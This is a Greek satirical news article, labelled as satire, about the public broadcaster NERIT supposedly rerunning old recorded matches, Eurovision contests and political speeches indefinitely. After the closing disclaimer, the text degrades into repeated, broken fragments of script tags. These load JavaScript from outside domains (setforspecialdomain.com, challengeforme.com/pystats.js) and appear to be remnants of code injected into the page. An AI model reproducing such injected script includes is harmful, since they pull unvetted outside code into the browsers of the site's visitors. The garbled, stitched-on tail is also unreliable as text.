Ξεπέρασε κάθε προηγούμενο η τηλεθέαση των μαγνητοσκοπημένων αγώνων της ΝΕΡΙΤ

Σημαντική πρωτιά για τη Δημόσια Ελληνική Τηλεόραση καθώς κατάφερε να συγκεντρώσει πολύ υψηλά ποσοστά τηλεθέασης στις προβολές των μαγνητοσκοπημένων αγώνων…

Γράφει η Βίκυ Κουλούρη

Διευθυντικά στελέχη της ΝΕΡΙΤ, ανακοίνωσαν πως προτίθενται να προβάλλουν τους ίδιους μαγνητοσκοπημένους αγώνες μέχρι να τους δει και ο τελευταίος Έλληνας, έπειτα από σύσκεψη που πραγματοποιήθηκε στο ραδιομέγαρο της Αγίας Παρασκευής.

Το σκεπτικό της απόφασης που δόθηκε στη δημοσιότητα αναφέρει μεταξύ άλλων ότι «οι αγώνες του Champion’s League και το Παγκόσμιο Κύπελλο ήταν μια τεράστια επιτυχία για τη ΝΕΡΙΤ», σημειώνοντας πως «έπιασαν τηλεθέαση που είχαμε να δούμε από την εποχή των Παιχνιδιών Χωρίς Σύνορα».

Η ανακοίνωση καταλήγει στο συμπέρασμα ότι «δεν υπάρχει λόγος να πετάξουμε τη συνταγή της επιτυχίας, άλλωστε ομάδα που κερδίζει δεν αλλάζει».

Έτσι, οι συχνότητες της ΝΕΡΙΤ αναμένεται να μεταδίδουν αγώνες του παρελθόντος που έγραψαν ιστορία είτε θετική είτε αρνητική. Οι ζωντανές εκπομπές και τα ντοκυμαντέρ θα διακοπούν οριστικά, καθώς δεν υπάρχει κανένας λόγος προβολής τους. Άλλωστε, όπως μας εκμυστηρεύτηκε σημαντικό διευθυντικό στέλεχος της ΝΕΡΙΤ, ακολουθείται η συνταγή της επιτυχίας του youtube, καθώς ύστερα από έρευνες προέκυψε ότι ολοένα και περισσότεροι Έλληνες αναζητούν στην δημοφιλή ιστοσελίδα προβολής video, παλιούς αγώνες.

Μάλιστα, στα θετικά της απόφασης προσμετρώνται η σημαντική ελάττωση του νέου περιεχομένου που θα πρέπει να παραχθεί, περιορίζοντας έτσι το κόστος λειτουργίας της ΝΕΡΙΤ. «Έτσι κι αλλιώς», τονίζουν, «δεν βλέπει και κανείς ΝΕΡΙΤ οπότε δεν έχουμε και πολλά να χάσουμε. Άσε που δίνουμε τη δυνατότητα στους προπονητές των ομάδων να δουν και να ξαναδούν τα λάθη του, προκειμένου να τα διορθώσουν, βοηθώντας με τον τρόπο αυτό καταλυτικά τον ελληνικό αθλητισμό».

Σύμφωνα με αποκλειστικές πληροφορίες του 4news.gr, τις επόμενες ημέρες θα προβληθούν στη ΝΕΡΙΤ:

– Η μετάδοση του διεθνούς τουρνουά ξυλορακέτας στα τέλη Αυγούστου

– Όλοι οι εντός έδρας αγώνας του Ολυμπιακού από το 1990 μέχρι σήμερα,

– Ξεχασμένες ελληνικές ταινίες που ανεξήγητα δεν έχουν προβληθεί επαρκώς

– Επιλεγμένοι αγώνες Champion’s League

– Όλοι οι διαγωνισμοί της Eurovision προκειμένου να αρχίσει ο κόσμος να μπαίνει στη διαδικασία για το 2015

– Ομιλίες πολιτικών αρχηγών στη ΔΕΘ.

(Σημείωση: Το κείμενο αυτό αποτελεί προϊόν επινόησης με στόχο τη σάτιρα και σε καμία περίπτωση δεν ανταποκρίνεται στην πραγματικότητα. Καταναλώστε τα υπεύθυνα)___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >